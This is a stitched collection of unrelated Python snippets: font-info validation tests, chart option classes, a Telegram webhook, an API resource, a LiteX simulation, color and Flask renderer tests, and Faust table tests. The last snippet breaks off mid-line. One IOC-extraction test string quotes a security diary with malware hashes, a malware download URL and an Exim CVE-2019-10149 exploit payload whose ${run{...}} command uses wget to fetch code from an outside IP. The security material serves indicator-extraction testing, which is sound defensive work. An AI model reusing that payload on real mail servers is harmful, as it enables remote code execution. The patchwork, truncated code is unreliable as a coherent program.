writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WinDescent = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Type = ['1'] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Type = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptXSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptYSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptXOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptYOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptXSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptYSize = 'abc' writer = 
UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptXOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptYOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2StrikeoutSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2StrikeoutPosition = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testVheaWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeVheaVertTypoAscender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaVertTypoDescender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaVertTypoLineGap = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaCaretSlopeRise = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaCaretSlopeRun = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaCaretOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testFONDWrite(self): infoObject = self.makeInfoObject() infoObject.macintoshFONDFamilyID = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.macintoshFONDName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testPostscriptWrite(self): infoObject = self.makeInfoObject() infoObject.postscriptFontName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFullName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptSlantAngle = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptUniqueID = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptUnderlineThickness = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptUnderlinePosition = 
'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptIsFixedPitch = 2 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueValues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueValues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueValues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptOtherBlues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptOtherBlues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptOtherBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyBlues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyBlues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyOtherBlues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyOtherBlues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyOtherBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptStemSnapH = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptStemSnapH = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptStemSnapV = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() 
infoObject.postscriptStemSnapV = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueFuzz = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueShift = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueScale = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptForceBold = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptDefaultWidthX = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptNominalWidthX = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptWeightName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptDefaultCharacter = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptWindowsCharacterSet = (- 1) writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.macintoshFONDFamilyID = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.macintoshFONDName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
class OptionSeriesLineSonificationDefaultinstrumentoptionsMapping(Options): def frequency(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingFrequency': return self._config_sub_data('frequency', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingFrequency) def gapBetweenNotes(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingGapbetweennotes': return self._config_sub_data('gapBetweenNotes', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingGapbetweennotes) def highpass(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingHighpass': return self._config_sub_data('highpass', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingHighpass) def lowpass(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingLowpass': return self._config_sub_data('lowpass', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingLowpass) def noteDuration(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingNoteduration': return self._config_sub_data('noteDuration', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingNoteduration) def pan(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPan': return self._config_sub_data('pan', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPan) def pitch(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPitch': return self._config_sub_data('pitch', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPitch) def playDelay(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPlaydelay': return self._config_sub_data('playDelay', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPlaydelay) def time(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTime': return self._config_sub_data('time', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTime) def tremolo(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTremolo': return self._config_sub_data('tremolo', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTremolo) def volume(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingVolume': return self._config_sub_data('volume', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingVolume)
class WebhookServ(tornado.web.RequestHandler): def data_received(self, chunk: bytes) -> Optional[Awaitable[None]]: pass def get(self): self.write('What are you doing here?') self.finish() def post(self): if (('Content-Length' in self.request.headers) and ('Content-Type' in self.request.headers) and (self.request.headers['Content-Type'] == 'application/json')): json_data = self.request.body.decode('utf-8') update = telebot.types.Update.de_json(json_data) bot.process_new_updates([update]) self.write('') self.finish() else: self.write('What are you doing here?') self.finish()
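A minimal sketch of how a handler like this is typically mounted in a Tornado application; the URL path and port below are illustrative assumptions, not taken from the original code.

# Hypothetical wiring for WebhookServ (path and port are assumptions):
import tornado.ioloop
import tornado.web

def make_app():
    # Telegram would POST JSON updates to this path; GET requests receive the stub reply.
    return tornado.web.Application([(r'/webhook', WebhookServ)])

if __name__ == '__main__':
    make_app().listen(8443)  # 8443 is one of the ports Telegram accepts for webhooks
    tornado.ioloop.IOLoop.current().start()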
class VideoStreamModeratorList(ResourceList): def before_post(self, args, kwargs, data): require_relationship(['video_stream'], data) stream = safe_query_kwargs(VideoStream, data, 'video_stream') if (not has_access('is_coorganizer', event_id=stream.event_id)): raise ForbiddenError({'pointer': 'user_id'}, 'Co-Organizer access required') def after_create_object(self, video_stream_moderator, data, view_kwargs): send_email_to_moderator(video_stream_moderator) def query(self, view_kwargs): query_ = self.session.query(VideoStreamModerator) if (user_id := view_kwargs.get('user_id')): if (current_user.id != int(user_id)): raise ForbiddenError({'pointer': 'user_id'}, "Cannot access other user's data") user = safe_query_kwargs(User, view_kwargs, 'user_id') query_ = query_.filter_by(email=user.email) elif view_kwargs.get('video_stream_id'): stream = safe_query_kwargs(VideoStream, view_kwargs, 'video_stream_id') if (not has_access('is_coorganizer', event_id=stream.event_id)): raise ForbiddenError({'pointer': 'user_id'}, 'Co-Organizer access required') query_ = query_.filter_by(video_stream_id=view_kwargs['video_stream_id']) else: raise ForbiddenError({'pointer': 'query'}, 'Cannot query all moderators') return query_ view_kwargs = True decorators = (jwt_required,) methods = ['GET', 'POST'] schema = VideoStreamModeratorSchema data_layer = {'session': db.session, 'model': VideoStreamModerator, 'methods': {'query': query, 'after_create_object': after_create_object}}
def parse(): s = '209.217.225.74 port 80 - hotelesmeflo.com - GET /chachapoyas/wp-content/themes/sketch/msr.exe\n SHA256 hash: a666fd9c896bc010b3fba825441e6c745d65807dfc ( File size: 9,261 bytes\n File description: Flash exploit used by Rig EK on 2019-06-17\n SHA256 hash: 2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5 ( File size: 354,304 bytes\n File description: Payload sent by Rig EK on 2019-06-17 (AZORult)\n SHA256 hash: a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8 ( File size: 2,952,704 bytes\n File description: Follow-up malware hosted on URL at hotelesmeflo.com on 2019-06-17\n Final words\n\n My infected Windows host\n Published : 2019-06-19\n Last Updated : 2019-06-19 14:34:52 UTC\n by Johannes Ullrich ( (Version: 1)\n\n Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 ( (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.\n\n A couple of logs from our own mail server (running postfix):\n\n > Jun 19 10:47:10 mail postfix/smtp[19006]: AF4: to=&lt;root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}&gt;, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 &lt;root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}&gt;: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command))\n\n The exploit is attempting to run the following command:\n\n > /bin/sht-ct &quot;wget 64.50.180.45/tmp/70.91.145.10&quot;\n\n Note that the IP at the end of the command is our mail servers public IP address. The URL does no longer appear to exist and belongs to a server running cPanel.\n\n The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..).\n\n ---\n Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute ( Twitter ( ' ioc_finder.find_iocs(s)
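For context, find_iocs returns a dict mapping indicator types to lists of extracted values; the key names below are from memory of the ioc-finder API and should be treated as assumptions.

# Usage sketch (key names assumed; verify against ioc-finder's docs):
import ioc_finder

iocs = ioc_finder.find_iocs('Traffic to hotelesmeflo.com from 209.217.225.74')
print(iocs['domains'])  # expected: ['hotelesmeflo.com']
print(iocs['ipv4s'])    # expected: ['209.217.225.74']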
class ChangeDtypes(elmdptt.TaskOneToOne): changed_columns = luigi.Parameter() def actual_task_code(self, df: pd.DataFrame): cols = ast.literal_eval(self.changed_columns) for (col_name, col_type) in cols.items(): df[col_name] = df[col_name].astype(col_type) return df
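Because changed_columns is parsed with ast.literal_eval, the parameter is expected to be the string form of a {column: dtype} dict. A self-contained sketch of that conversion loop follows (column names and dtypes are illustrative):

# Illustrative only: mirrors the loop in actual_task_code above.
import ast
import pandas as pd

changed_columns = "{'age': 'int64', 'price': 'float64'}"
df = pd.DataFrame({'age': ['1', '2'], 'price': ['3.5', '4.0']})
for (col_name, col_type) in ast.literal_eval(changed_columns).items():
    df[col_name] = df[col_name].astype(col_type)
print(df.dtypes)  # age becomes int64, price becomes float64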
class SimSoC(SoCCore): def __init__(self, clocks, trace_reset=1, auto_precharge=False, with_refresh=True, **kwargs): platform = Platform() sys_clk_freq = clocks['sys']['freq_hz'] SoCCore.__init__(self, platform, clk_freq=sys_clk_freq, ident='LiteX Simulation', cpu_variant='lite', **kwargs) self.submodules.crg = _CRG(platform, clocks.names()) platform.add_debug(self, reset=trace_reset) sdram_module = EM6GA16L(sys_clk_freq, '1:4') pads = platform.request('rpcdram') self.submodules.ddrphy = SimulationPHY(pads, sys_clk_freq=sys_clk_freq, generate_read_data=True) self.add_csr('ddrphy') controller_settings = ControllerSettings() controller_settings.auto_precharge = auto_precharge controller_settings.with_refresh = with_refresh self.add_sdram('sdram', phy=self.ddrphy, module=sdram_module, origin=self.mem_map['main_ram'], size=kwargs.get('max_sdram_size', 0x40000000), l2_cache_size=kwargs.get('l2_size', 8192), l2_cache_min_data_width=kwargs.get('min_l2_data_width', 128), l2_cache_reverse=False, controller_settings=controller_settings) self.add_constant('MEMTEST_DATA_SIZE', (8 * 1024)) self.add_constant('MEMTEST_ADDR_SIZE', (8 * 1024)) self.add_constant('CONFIG_SIM_DISABLE_BIOS_PROMPT') self.submodules.ddrctrl = LiteDRAMCoreControl() self.add_csr('ddrctrl') self.sync += If(self.ddrctrl.init_done.storage, Finish()) def dump(obj): print() print((' ' + obj.__class__.__name__)) print((' ' + ('-' * len(obj.__class__.__name__)))) d = (obj if isinstance(obj, dict) else vars(obj)) for (var, val) in d.items(): if (var == 'self'): continue print(' {}: {}'.format(var, val)) print(('=' * 80)) dump(clocks) dump(self.ddrphy.settings) dump(sdram_module.geom_settings) dump(sdram_module.timing_settings) print() print(('=' * 80))
class TestOkLChProperties(util.ColorAsserts, unittest.TestCase): def test_lightness(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['lightness'], 0.9) c['lightness'] = 0.2 self.assertEqual(c['lightness'], 0.2) def test_chroma(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['chroma'], 0.5) c['chroma'] = 0.1 self.assertEqual(c['chroma'], 0.1) def test_hue(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['hue'], 270) c['hue'] = 0.1 self.assertEqual(c['hue'], 0.1) def test_alpha(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['alpha'], 1) c['alpha'] = 0.5 self.assertEqual(c['alpha'], 0.5)
class RendererTests(unittest.TestCase): def _make_app(self): app = FlaskAPI(__name__) @app.route('/_love', methods=['GET']) def love(): return {'test': 'I <3 Python'} return app def test_render_json(self): app = self._make_app() renderer = renderers.JSONRenderer() with app.app_context(): content = renderer.render({'example': 'example'}, MediaType('application/json')) expected = '{"example": "example"}' self.assertEqual(content, expected) def test_render_json_with_indent(self): app = self._make_app() renderer = renderers.JSONRenderer() with app.app_context(): content = renderer.render({'example': 'example'}, MediaType('application/json; indent=4')) expected = '{\n    "example": "example"\n}' self.assertEqual(content, expected) def test_render_json_with_custom_encoder(self): class CustomJsonProvider(DefaultJSONProvider): def default(self, o): if isinstance(o, datetime): return o.isoformat() return super().default(o) app = self._make_app() app.json = CustomJsonProvider(app) renderer = renderers.JSONRenderer() date = datetime(2017, 10, 5, 15, 22) with app.app_context(): content = renderer.render(date, MediaType('application/json')) self.assertEqual(content, '"{}"'.format(date.isoformat())) def test_render_browsable_encoding(self): app = FlaskAPI(__name__) @app.route('/_love', methods=['GET']) def love(): return {'test': 'I <3 Python'} with app.test_client() as client: response = client.get('/_love', headers={'Accept': 'text/html'}) html = str(response.get_data()) self.assertTrue(('I &lt;3 Python' in html)) self.assertTrue(('<h1>Love</h1>' in html)) self.assertTrue(('/_love' in html)) def test_render_browsable_encoding_with_markdown(self): app = FlaskAPI(__name__) @app.route('/_foo', methods=['GET']) def foo(): 'Bar: `qux`' return {'test': 'I <3 Python'} with app.test_client() as client: response = client.get('/_foo', headers={'Accept': 'text/html'}) html = str(response.get_data()) print(html) self.assertTrue(('<h1>Foo</h1>' in html)) self.assertTrue(('<p>Bar:' in html)) self.assertTrue(('<code>qux</code>' in html)) def test_render_browsable_linking(self): app = FlaskAPI(__name__) @app.route('/_happiness', methods=['GET']) def happiness(): return {'url': 'http://example.com', 'a tag': '<br />'} with app.test_client() as client: response = client.get('/_happiness', headers={'Accept': 'text/html'}) html = str(response.get_data()) self.assertTrue(('<a href="http://example.com"' in html)) self.assertTrue(('&lt;br /&gt;' in html)) self.assertTrue(('<h1>Happiness</h1>' in html)) self.assertTrue(('/_happiness' in html)) def test_renderer_negotiation_not_implemented(self): renderer = renderers.BaseRenderer() with self.assertRaises(NotImplementedError) as context: renderer.render(None, None) msg = str(context.exception) expected = '`render()` method must be implemented for class "BaseRenderer"' self.assertEqual(msg, expected)
class Test_Collection(): @pytest.fixture def table(self, *, app): return MyTable(app, name='name') def test_key_type_bytes_implies_raw_serializer(self, *, app): table = MyTable(app, name='name', key_type=bytes) assert (table.key_serializer == 'raw') @pytest.mark.asyncio async def test_init_on_recover(self, *, app): on_recover = AsyncMock(name='on_recover') t = MyTable(app, name='name', on_recover=on_recover) assert (on_recover in t._recover_callbacks) (await t.call_recover_callbacks()) on_recover.assert_called_once_with() @pytest.mark.asyncio async def test_on_recovery_completed(self, *, table): table.call_recover_callbacks = AsyncMock() (await table.on_recovery_completed(set(), set())) table.call_recover_callbacks.assert_called_once_with() def test_hash(self, *, table): assert hash(table) @pytest.mark.asyncio async def test_on_start(self, *, table): table.changelog_topic = Mock(name='changelog_topic', autospec=Topic, maybe_declare=AsyncMock()) (await table.on_start()) table.changelog_topic.maybe_declare.assert_called_once_with() def test_info(self, *, table): assert (table.info() == {'app': table.app, 'name': table.name, 'store': table._store, 'default': table.default, 'schema': table.schema, 'key_type': table.key_type, 'value_type': table.value_type, 'changelog_topic': table._changelog_topic, 'window': table.window, 'extra_topic_configs': table.extra_topic_configs, 'on_changelog_event': table._on_changelog_event, 'recover_callbacks': table._recover_callbacks, 'partitions': table.partitions, 'recovery_buffer_size': table.recovery_buffer_size, 'standby_buffer_size': table.standby_buffer_size, 'use_partitioner': table.use_partitioner}) def test_persisted_offset(self, *, table): data = table._data = Mock(name='_data') assert (table.persisted_offset(TP1) == data.persisted_offset()) @pytest.mark.asyncio async def test_need_active_standby_for(self, *, table): table._data = Mock(name='_data', autospec=Store, need_active_standby_for=AsyncMock()) assert ((await table.need_active_standby_for(TP1)) == table._data.need_active_standby_for.return_value) def test_reset_state(self, *, table): data = table._data = Mock(name='_data', autospec=Store) table.reset_state() data.reset_state.assert_called_once_with() def test_send_changelog(self, *, table): table.changelog_topic.send_soon = Mock(name='send_soon') event = Mock(name='event') table._send_changelog(event, 'k', 'v') table.changelog_topic.send_soon.assert_called_once_with(key='k', value='v', partition=event.message.partition, key_serializer='json', value_serializer='json', callback=table._on_changelog_sent, eager_partitioning=True) def test_send_changelog__custom_serializers(self, *, table): event = Mock(name='event') table.changelog_topic.send_soon = Mock(name='send_soon') table._send_changelog(event, 'k', 'v', key_serializer='raw', value_serializer='raw') table.changelog_topic.send_soon.assert_called_once_with(key='k', value='v', partition=event.message.partition, key_serializer='raw', value_serializer='raw', callback=table._on_changelog_sent, eager_partitioning=True) def test_send_changelog__no_current_event(self, *, table): with pytest.raises(RuntimeError): table._send_changelog(None, 'k', 'v') def test_on_changelog_sent(self, *, table): fut = Mock(name='future', autospec=asyncio.Future) table._data = Mock(name='data', autospec=Store) table._on_changelog_sent(fut) table._data.set_persisted_offset.assert_called_once_with(fut.result().topic_partition, fut.result().offset) def test_on_changelog_sent__transactions(self, *, table): table.app.in_transaction = True table.app.tables = Mock(name='tables') fut = 
Mock(name='fut') table._on_changelog_sent(fut) table.app.tables.persist_offset_on_commit.assert_called_once_with(table.data, fut.result().topic_partition, fut.result().offset) @pytest.mark.asyncio async def test_last_closed_window(self, *, table): assert (table.last_closed_window == 0.0) table.window = Mock(name='window') table._data = {('boo', (1.1, 1.4)): 'BOO', ('moo', (1.4, 1.6)): 'MOO', ('faa', (1.9, 2.0)): 'FAA', ('bar', (4.1, 4.2)): 'BAR'} table._partition_timestamps = {TP1: [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]} table._partition_timestamp_keys = {(TP1, 2.0): [('boo', (1.1, 1.4)), ('moo', (1.4, 1.6)), ('faa', (1.9, 2.0))], (TP1, 5.0): [('bar', (4.1, 4.2))]} def get_stale(limit): def is_stale(timestamp, latest_timestamp): return (timestamp < limit) return is_stale table.window.stale.side_effect = get_stale(4.0) (await table._del_old_keys()) assert (table.last_closed_window == 1.9) @pytest.mark.asyncio async def test_del_old_keys__empty(self, *, table): table.window = Mock(name='window') (await table._del_old_keys()) @pytest.mark.asyncio async def test_del_old_keys(self, *, table): on_window_close = table._on_window_close = AsyncMock(name='on_window_close') table.window = Mock(name='window') table._data = {('boo', (1.1, 1.4)): 'BOO', ('moo', (1.4, 1.6)): 'MOO', ('faa', (1.9, 2.0)): 'FAA', ('bar', (4.1, 4.2)): 'BAR'} table._partition_timestamps = {TP1: [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]} table._partition_timestamp_keys = {(TP1, 2.0): [('boo', (1.1, 1.4)), ('moo', (1.4, 1.6)), ('faa', (1.9, 2.0))], (TP1, 5.0): [('bar', (4.1, 4.2))]} def get_stale(limit): def is_stale(timestamp, latest_timestamp): return (timestamp < limit) return is_stale table.window.stale.side_effect = get_stale(4.0) (await table._del_old_keys()) assert (table._partition_timestamps[TP1] == [4.0, 5.0, 6.0, 7.0]) assert (table.data == {('bar', (4.1, 4.2)): 'BAR'}) on_window_close.assert_has_calls([call.__bool__(), call(('boo', (1.1, 1.4)), 'BOO'), call.__bool__(), call(('moo', (1.4, 1.6)), 'MOO'), call.__bool__(), call(('faa', (1.9, 2.0)), 'FAA')]) table.last_closed_window = 8.0 table.window.stale.side_effect = get_stale(6.0) (await table._del_old_keys()) assert (not table.data) @pytest.mark.asyncio async def test_del_old_keys_non_async_cb(self, *, table): on_window_close = table._on_window_close = Mock(name='on_window_close') table.window = Mock(name='window') table._data = {('boo', (1.1, 1.4)): 'BOO', ('moo', (1.4, 1.6)): 'MOO', ('faa', (1.9, 2.0)): 'FAA', ('bar', (4.1, 4.2)): 'BAR'} table._partition_timestamps = {TP1: [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]} table._partition_timestamp_keys = {(TP1, 2.0): [('boo', (1.1, 1.4)), ('moo', (1.4, 1.6)), ('faa', (1.9, 2.0))], (TP1, 5.0): [('bar', (4.1, 4.2))]} def get_stale(limit): def is_stale(timestamp, latest_timestamp): return (timestamp < limit) return is_stale table.window.stale.side_effect = get_stale(4.0) (await table._del_old_keys()) assert (table._partition_timestamps[TP1] == [4.0, 5.0, 6.0, 7.0]) assert (table.data == {('bar', (4.1, 4.2)): 'BAR'}) on_window_close.assert_has_calls([call(('boo', (1.1, 1.4)), 'BOO'), call(('moo', (1.4, 1.6)), 'MOO'), call(('faa', (1.9, 2.0)), 'FAA')]) table.last_closed_window = 8.0 table.window.stale.side_effect = get_stale(6.0) (await table._del_old_keys()) assert (not table.data) @pytest.mark.asyncio async def test_on_window_close__default(self, *, table): assert (table._on_window_close is None) (await table.on_window_close(('boo', 